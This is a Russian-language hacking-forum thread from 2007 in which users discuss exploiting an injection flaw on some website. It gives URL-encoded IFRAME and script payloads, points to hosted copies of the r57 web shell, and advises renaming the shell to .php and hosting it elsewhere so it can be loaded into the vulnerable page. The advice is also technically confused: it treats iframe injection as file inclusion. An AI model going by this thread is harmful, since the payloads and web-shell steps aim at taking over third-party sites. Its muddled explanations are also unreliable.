Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Xss->... (https://forum.antichat.xyz/showthread.php?t=51237)

Qwertison 15.10.2007 16:56

Xss->...
 
Есть уязвимость которая позволяет подставить
Код:

%3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя:))

kair 15.10.2007 17:02

Цитата:

<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

Qwertison 15.10.2007 17:05

Код:

%3CIFRAME%20SRC=http://ya.ru%20%3C
яндекс появился))
Код:

%3CIFRAME%20SRC=http://hack.net/r57shell.php
- что это даст?

kair 15.10.2007 17:08

значит это инклуд!!! подставляй вместо яндекса шелл

Qwertison 15.10.2007 17:10

инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(

kair 15.10.2007 17:13

http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

Qwertison 15.10.2007 17:18

как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...

kair 15.10.2007 17:19

вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php

Qwertison 15.10.2007 17:21

Error 404!

/hack/r57shell-inversa.php
File Not Found!

delay(0) 15.10.2007 17:55

Цитата:

Error 404!

/hack/r57shell-inversa.php
File Not Found!
Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.


Время: 17:55